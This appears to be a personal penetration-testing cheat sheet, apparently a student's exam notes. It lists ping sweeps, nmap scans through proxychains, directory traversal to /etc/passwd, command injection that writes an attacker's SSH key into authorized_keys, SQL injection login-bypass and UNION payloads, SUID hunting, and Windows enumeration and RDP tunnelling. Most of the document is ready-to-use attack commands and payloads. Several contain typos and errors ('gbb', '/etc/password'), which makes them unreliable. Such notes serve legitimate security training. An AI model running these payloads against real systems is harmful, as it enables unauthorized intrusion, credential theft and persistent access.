Master_Test_notes.md

RECON PHASE

Ping Sweep Scripts

LINUX

for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done

Windows

for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up

NMAP

nmap -Pn -T5 -sT <IP>

ssh [email protected] -D 9050

proxychains nmap -Pn -T5 -sT -p 80 --script http-enum.nse <IP>
proxychains nmap -Pn -T5 -sT -p 80 --script http-sql-injection.nse <IP>
proxychains nmap -Pn -T5 -sT -p 80 --script http-robots.txt.nse <IP>

nikto v -h <IP>

Web Exploitation

wget

wget -r -l2 -P <web ip>

Directory Traversal

• When a webpage is set to read files us ../

    etc/passwd - take not of users
    etc/host - network enum
    etc/networks - network enum
    etc/groups - group infomation

Command Injection

• When a webpage allows command execution

On local host

ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub # copy The public key

Inject

; whoami 
; cat /etc/password # Take note of the users home directory
; ls -la <home directory>

; mkdir <home directory>/.ssh # only if there is only /.ssh before
; echo "<public key>" > <home directory>/.ssh/authorized_keys

SQL Injection

• using Valid SQL queries to manipulate data

Login Bypass

tom' OR 1=1 # -- paste in both username and password fields

#### if the creds didn't dump ####
# press F12
# under network tab
# copy raw sql from post
# <URL>/placeholder.pnp?<paste here>

GET Method(URL)

<URL>/uniondemo.php?Selection=2 UNION SELECT 1,table_name,3 FROM information_schema.tables

<URL>/uniondemo.php?Selection=2 UNION SELECT 1,table_schema,table_name FROM information_schema.tables

<URL>/uniondemo.php?Selection=2 UNION SELECT table_name,1,column_name FROM information_schema.columns

<URL>/uniondemo.php?Selection=2 UNION SELECT table_schema,column_name,table_name FROM information_schema.columns

<URL>/uniondemo.php?Selection=2 UNION SELECT null,name,color FROM car

POST Method (Form INPUT)

Audi' UNION SELECT 1,2,table_name,4,5 FROM information_schema.tables #

Audi' UNION SELECT 1,2,3,table_schema,table_name FROM information_schema.tables; #

Audi' UNION SELECT 1,2,table_schema,table_name,column_name FROM information_schema.columns; #     

Audi' UNION SELECT 1,2,3,name,size FROM session.Tires; #

Audi' UNION SELECT @@version,database(),3,name,size FROM session.Tires; #

Linux Boxes

Ennumeration

ps -elf # shows every process

ps-aux # look for SYSLOG and RSYSLOG 
# note syslog and rsyslog conf files are under /etc

lsof # shows all open files

cat # The fallowing file are good ones to check
# /etc/crontab - running jobs
# /etc/sodoers - list of users that can run sudo 
# /etc/hosts - network infomation

find / -iname *example*

Vulnerable suid/sgid executables

• https://gtfobins.github.io/

find / -type f -perm /4000 -ls 2>/dev/null # Find SUID only files

find / -type f -perm /2000 -ls 2>/dev/null # Find SGID only files

find / -type f -perm /6000 -ls 2>/dev/null # Find SUID and/or SGID files

Linux exploitation

scp ./RE_This student@<ME> /home/dir/ # scp <Source> <Destionation>
gbb ./RE_This 
Start with main 
dissasmble unitl you find bad funtioncalls  
run << @(<random nums from wiremask>)

Windows

Xfreerdp through a tunnel

ssh <user>@<redir> -L <RHP>:<windows box>:3389 -NT
xfreerdp /u:<winuser> /p:<passwd> /v:127.0.0.1:<RHP> /dynamic-resolution +glyph-cache +clipboard

Ennumeration

net user # user information

net localgroup # groups information

tasklist /v # Process Enumeraation

arp -a # arp table

GUI

• reg edit
• services
• sch task